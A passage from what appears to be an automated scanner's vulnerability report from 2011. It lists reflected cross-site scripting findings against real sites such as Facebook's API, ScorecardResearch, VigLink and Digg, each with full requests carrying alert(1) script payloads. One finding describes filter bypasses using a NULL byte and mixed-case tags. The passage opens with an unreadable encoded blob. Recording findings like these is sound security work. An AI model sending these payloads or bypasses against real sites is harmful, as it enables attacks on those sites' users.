<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#RSx!!!!#<m*gT!#RY.!!!!'<m8qE!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#X]l!!!!'<m8qE!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]DN!!!!#<m8qE!#]W%!!!!'<m8qE!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^Bo!!!!'<m8qE!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g[h!!!!'<m8qE!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mJR!!!!#<m8qE!#mP5!!!!$<lise!#mP6!!!!$<lise!#naX!!!!'<m8qE!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p#b!!!!'<m8qE
!#p9d!!!!#<lj09!#pD8!!!!'<m8>B!#sx#!!!!3<m9Vd"

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:17:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 11 Feb 2011 18:17:00 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?95cdf"-alert(1)-"14e796c9f61=1&Z=728x90&s=1333214&_salt=2292189709";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

1.61. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7 was submitted in the method parameter. This input was echoed as 5381e<img src=a onerror=alert(1)>9d6042fa9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:20 GMT
Content-Length: 360

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats5381e<img src=a onerror=alert(1)>9d6042fa9f7"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.62. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9 was submitted in the urls parameter. This input was echoed as 8585e<img src=a onerror=alert(1)>f213777d1e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 11 Feb 2011 10:17:39 -0800
Pragma:
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Length: 376

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]8585e<img src=a onerror=alert(1)>f213777d1e9"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.63. http://api.viglink.com/api/ping [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 7e217<script>alert(1)</script>53abc6bf11f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f&loc=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F219333%2Fonline_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fv&v=1&jsonp=vglnk_jsonp_12974526338310 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 11 Feb 2011 19:30:09 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f

1.64. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1d93c<script>alert(1)</script>f83ad48726e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=81d93c<script>alert(1)</script>f83ad48726e&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"81d93c<script>alert(1)</script>f83ad48726e", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.65. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7e92c<script>alert(1)</script>29a2dc4c34a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=7e92c<script>alert(1)</script>29a2dc4c34a HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"7e92c<script>alert(1)</script>29a2dc4c34a", c16:"", r:""});

1.66. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 24c33<script>alert(1)</script>f3089f61a81 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603514524c33<script>alert(1)</script>f3089f61a81&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603514524c33<script>alert(1)</script>f3089f61a81", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.67. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 95862<script>alert(1)</script>76f209dab7e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=484500000000000000395862<script>alert(1)</script>76f209dab7e&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"484500000000000000395862<script>alert(1)</script>76f209dab7e", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.68. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 24119<script>alert(1)</script>6e5828325a3 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=24119<script>alert(1)</script>6e5828325a3&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"24119<script>alert(1)</script>6e5828325a3", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.69. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8f81a<script>alert(1)</script>dff6d8e6cce was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=8f81a<script>alert(1)</script>dff6d8e6cce&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
re;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"8f81a<script>alert(1)</script>dff6d8e6cce", c6:"", c10:"", c15:"", c16:"", r:""});

1.70. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 28803<script>alert(1)</script>08c6fcd7d5f was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=28803<script>alert(1)</script>08c6fcd7d5f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"28803<script>alert(1)</script>08c6fcd7d5f", c10:"", c15:"", c16:"", r:""});

1.71. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae30b<script>alert(1)</script>9f79a2b85ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:14 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 1676992181
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css

1.72. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae7a8<script>alert(1)</script>a9785df6772 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:16 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 3841015658
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772

1.73. http://digg.com/remote-submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb was submitted in the REST URL parameter 1. This input was echoed as 74e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:37 GMT; path=/; domain=digg.com
Set-Cookie: d=8c53a5f3d0217831cca27dd9a043299858a02c2ad24e2c437b53eb8a7149e65f; expires=Thu, 11-Feb-2021 07:16:17 GMT; path=/; domain=.digg.com
X-Digg-Time: D=241537 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
